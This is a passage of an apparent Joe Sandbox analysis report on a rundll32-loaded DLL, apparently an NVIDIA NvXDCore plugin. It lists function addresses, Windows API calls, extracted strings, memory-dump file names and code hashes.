                                                                    Similarity
                                                                    • API ID: AddressProc$Local$AllocConditionFreeInfoMaskVerifyVersion
                                                                    • String ID: Advapi32.dll$RegCloseKey$RegEnumValueW$RegOpenKeyExW
                                                                    • API String ID: 576420853-1884500446
                                                                    • Opcode ID: f73ff4851a463b3f7fdb30ce46c8df8383579259be15c863f66517dffea24ec0
                                                                    • Instruction ID: 0db856ba6606d7fa26a4907be38cf2360b6f5faceab299f8f78175f92eacbe69
                                                                    • Opcode Fuzzy Hash: f73ff4851a463b3f7fdb30ce46c8df8383579259be15c863f66517dffea24ec0
                                                                    • Instruction Fuzzy Hash: 50515B31A0BB02A2FB918B16A85037966A1FF58BD4F444138DE4D077A4EF7CF825C638
                                                                    Function 00007FF8A8CFF474 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 302memorystringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Task$CriticalSection$AllocEnterFreeLeaveRealloclstrcmpi
                                                                    • String ID: }}$HKCR$HKCU{Software{Classes
                                                                    • API String ID: 581389959-1142484189
                                                                    • Opcode ID: ed0ea84bc2394703962b9794f8839fa00afcfd3d746f69359d03b77b6050c4e0
                                                                    • Instruction ID: 0d7dcafeb20bdc0c9ee61b52644c8b4009208f648db788e370b97477d6ec8df4
                                                                    • Opcode Fuzzy Hash: ed0ea84bc2394703962b9794f8839fa00afcfd3d746f69359d03b77b6050c4e0
                                                                    • Instruction Fuzzy Hash: B5C1A922B1BB42A5FBA09B6194006BC23A1EF49BD4F044135CE5E577E4DFB8AC60C728
                                                                    Function 00007FF8A8D0029C Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 177COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Module$EnterErrorFileHandleInitializeLastLeaveName_invalid_parameter_noinfo
                                                                    • String ID: Module$Module_Raw$REGISTRY
                                                                    • API String ID: 667740459-549000027
                                                                    • Opcode ID: 6718bed766d3dfc85253c4ec849bde6bfa10f7b56c70e713029dce48e9b8e986
                                                                    • Instruction ID: ddc2405385318114739c9fe0e71b95fc3cd4867507472f08869aca37b20efdc6
                                                                    • Opcode Fuzzy Hash: 6718bed766d3dfc85253c4ec849bde6bfa10f7b56c70e713029dce48e9b8e986
                                                                    • Instruction Fuzzy Hash: CD719E22A1A782B5FB209B65D8406FD2360FF447C4F805036DA5F5BA95EF3CE949C728
                                                                    Function 00007FF8A8D30DB0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 162synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Event$Init_thread_footerObjectSingleWait
                                                                    • String ID: NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::OnStop$Received Service Stop request from NvContainer$Releasing lease
                                                                    • API String ID: 1241757697-2813696767
                                                                    • Opcode ID: 07cdadacfe6124c7e27f98328c3df111e83a9041b0ca63e8cf450c78d187c62d
                                                                    • Instruction ID: 3859b8407d199c6186f5189163ab16f5dbb1e24f07cae5321303a2c69eba7c5b
                                                                    • Opcode Fuzzy Hash: 07cdadacfe6124c7e27f98328c3df111e83a9041b0ca63e8cf450c78d187c62d
                                                                    • Instruction Fuzzy Hash: 03810D32A0AB52E9EB109B61E8401ED7774FB847D4F40013AEA9D13B65EF3CD569C368
                                                                    Function 00007FF8A8CFD188 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 129libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(?,?,00000000,?,00000000,00000000,?,00007FF8A8CFB4A1), ref: 00007FF8A8CFD1F1
                                                                    • GetProcAddress.KERNEL32(?,?,00000000,?,00000000,00000000,?,00007FF8A8CFB4A1), ref: 00007FF8A8CFD220
                                                                      • Part of subcall function 00007FF8A8CFAB70: VerSetConditionMask.KERNEL32 ref: 00007FF8A8CFABB0
                                                                      • Part of subcall function 00007FF8A8CFAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FF8A8CFABDE
                                                                    • SetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,?,00007FF8A8CFB4A1), ref: 00007FF8A8CFD2BB
                                                                    • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,?,00007FF8A8CFB4A1), ref: 00007FF8A8CFD316
                                                                    • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,?,00007FF8A8CFB4A1), ref: 00007FF8A8CFD352
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeLocalProc$ConditionErrorInfoLastMaskVerifyVersion
                                                                    • String ID: Advapi32.dll$RegCloseKey$RegOpenKeyExW
                                                                    • API String ID: 2895588624-618571997
                                                                    • Opcode ID: c274dfffcf539c4011ebde4711aa22a1165f4ce2621b98982a0dc9153418fb4f
                                                                    • Instruction ID: 5f653e1fb69fd750b5a3ac12f4663ab99f4e59b9ce6ce00eaa5a30ef84ca7d76
                                                                    • Opcode Fuzzy Hash: c274dfffcf539c4011ebde4711aa22a1165f4ce2621b98982a0dc9153418fb4f
                                                                    • Instruction Fuzzy Hash: CA515B21A0FB02A1FFA49B16A84027966A1EF55FC0F084435DE4E47795EF7CEC25CB28
                                                                    Function 00007FF8A8CFE290 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 76libraryloaderregistryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc$Delete
                                                                    • String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
                                                                    • API String ID: 2668475584-1053001802
                                                                    • Opcode ID: 1be05aa186b517d8e315ca0390f6c762f93e95b826797c49909e1833bbc15feb
                                                                    • Instruction ID: 15fa366b32e8ab2d415ea6c4a4856a1e02c8c2eac6da5cc0f244ff2157dbc4bc
                                                                    • Opcode Fuzzy Hash: 1be05aa186b517d8e315ca0390f6c762f93e95b826797c49909e1833bbc15feb
                                                                    • Instruction Fuzzy Hash: 00314C35A0EB42E1FB509B15E44837863A0EF49BC0F484435CA4D0B754EFBCE9548729
                                                                    Function 00007FF8A8CFC620 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$ConditionErrorInfoLastMaskVerifyVersion
                                                                    • String ID: Advapi32.dll$CurrentBuildNumber$RegCloseKey$RegOpenKeyExW$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                    • API String ID: 3372643087-2525593150
                                                                    • Opcode ID: 4138a556be4e36f1c6ec5994f7970d6f94c359b06625e77941bd0f78e503e05d
                                                                    • Instruction ID: 5a3517ef525ec3d2904f0e670c67f0345f032348163aa3db0f5e6fcf20f63822
                                                                    • Opcode Fuzzy Hash: 4138a556be4e36f1c6ec5994f7970d6f94c359b06625e77941bd0f78e503e05d
                                                                    • Instruction Fuzzy Hash: 83310735A0EB56E2FB409B15F85027863A1FFA8BC4F085039D95D07365EFBCE9258728
                                                                    Function 00007FF8A8D2E570 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 235COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ActiveConsoleEnumerateFreeMemorySessionSessions
                                                                    • String ID: CreateChildProcesses$NvXDCore.cpp$child processes Session id is$launching sync from child processes
                                                                    • API String ID: 1575273685-1535587637
                                                                    • Opcode ID: 87ec771f0fe3288fe32883445848f72c1213374a5a1994cfcb171297897ea939
                                                                    • Instruction ID: 4bd3e8ed45aed42f383c5112440500232c67fa8fde49292873705e6349394f93
                                                                    • Opcode Fuzzy Hash: 87ec771f0fe3288fe32883445848f72c1213374a5a1994cfcb171297897ea939
                                                                    • Instruction Fuzzy Hash: B5B1E732B06B41AAE710DBB1E4401ED33B9FB45798B800536DE5D27B59EF38E119C758
                                                                    Function 00007FF8A8D30790 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 196COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: EventInit_thread_footerNotificationRegisterSession
                                                                    • String ID: $Failed to register for events. Aborting....$NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::OnStart$Received OnStart() from NvContainer
                                                                    • API String ID: 3215995041-3029981044
                                                                    • Opcode ID: 5afc532b50c0a2432de28eb12ead310b30af275e68d7fd9224e065bd5a3b1fda
                                                                    • Instruction ID: 0f3a0c5b9223ec8316ed16b3d2c41933ea1cc20639cbd97b6f5e758739e0a2ad
                                                                    • Opcode Fuzzy Hash: 5afc532b50c0a2432de28eb12ead310b30af275e68d7fd9224e065bd5a3b1fda
                                                                    • Instruction Fuzzy Hash: 01A12A3290EB82E5EB209B15F4502EAB3A4FB897D0F400235D69D53B65EF3CD558CB68
                                                                    Function 00007FF8A8CFCF24 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 161libraryloadermemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF8A8CFCFA8
                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF8A8CFCFD4
                                                                      • Part of subcall function 00007FF8A8CFAB70: VerSetConditionMask.KERNEL32 ref: 00007FF8A8CFABB0
                                                                      • Part of subcall function 00007FF8A8CFAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FF8A8CFABDE
                                                                    • LocalAlloc.KERNEL32 ref: 00007FF8A8CFD095
                                                                    • LocalFree.KERNEL32 ref: 00007FF8A8CFD133
                                                                      • Part of subcall function 00007FF8A8CFCCF0: GetProcAddress.KERNEL32 ref: 00007FF8A8CFCD50
                                                                      • Part of subcall function 00007FF8A8CFCCF0: GetProcAddress.KERNEL32 ref: 00007FF8A8CFCD80
                                                                      • Part of subcall function 00007FF8A8CFCCF0: GetProcAddress.KERNEL32 ref: 00007FF8A8CFCDAC
                                                                      • Part of subcall function 00007FF8A8CFCCF0: GetProcAddress.KERNEL32 ref: 00007FF8A8CFCDD8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Local$AllocConditionFreeInfoMaskVerifyVersion
                                                                    • String ID: SetupDiDestroyDeviceInfoList$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
                                                                    • API String ID: 576420853-448828884
                                                                    • Opcode ID: 75ca3b4daf19c0ae202a036e62fa29883766883f936f302ba286705c7fc52e7c
                                                                    • Instruction ID: 51f2968893ceb38f7e4572a2bf1731faab4c10fe8aca4920c044af2d23ccadd3
                                                                    • Opcode Fuzzy Hash: 75ca3b4daf19c0ae202a036e62fa29883766883f936f302ba286705c7fc52e7c
                                                                    • Instruction Fuzzy Hash: 91617A32B0AB02AAFB50CB21A8506B963A0FF487D8F044435DE0D57B54EF7CE965C728
                                                                    Function 00007FF8A8D21E88 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 117COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: GetcvtMbrtowc
                                                                    • String ID: ,$false$true
                                                                    • API String ID: 1343364124-760133229
                                                                    • Opcode ID: 0b1bcfc9a2141f98c58bfd7c441482c31248d9d3300556453ba9b0e63a9bf294
                                                                    • Instruction ID: 3f00cca7e07f7b0887b4469fa9949a2b56b89ea252b75ed3b6b53c4192c8d641
                                                                    • Opcode Fuzzy Hash: 0b1bcfc9a2141f98c58bfd7c441482c31248d9d3300556453ba9b0e63a9bf294
                                                                    • Instruction Fuzzy Hash: F0518E22619BC1A1D720DF21E4402AA77B0FB88790F405236EB9E47B69EF3CE599C754
                                                                    Function 00007FF8A8D03848 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_$__std_exception_copy
                                                                    • String ID: returned $RegistryException:
                                                                    • API String ID: 3384336446-434066331
                                                                    • Opcode ID: 00755f9cf649a541bb6ffdbe0a6f89ec2a048edb149ce880b7e54dc54dc62ce7
                                                                    • Instruction ID: 115bbf5bf24f53f2977637211e415c9119632a10edda4f059ad5fb8bb25e2927
                                                                    • Opcode Fuzzy Hash: 00755f9cf649a541bb6ffdbe0a6f89ec2a048edb149ce880b7e54dc54dc62ce7
                                                                    • Instruction Fuzzy Hash: 4A41AB72B0AA41A9FB04CFA5E8401EC3336EB447D8F404036CA5E63BAADF38D559C358
                                                                    Function 00007FF8A8D09570 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D0EA24: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D0EA6E
                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FF8A8D096A4
                                                                      • Part of subcall function 00007FF8A8D00A80: __std_exception_copy.LIBVCRUNTIME ref: 00007FF8A8D00AB2
                                                                    • _CxxThrowException.LIBVCRUNTIME ref: 00007FF8A8D096B4
                                                                      • Part of subcall function 00007FF8A8DC1390: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A8D9B7E3), ref: 00007FF8A8DC140D
                                                                      • Part of subcall function 00007FF8A8DC1390: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A8D9B7E3), ref: 00007FF8A8DC144C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
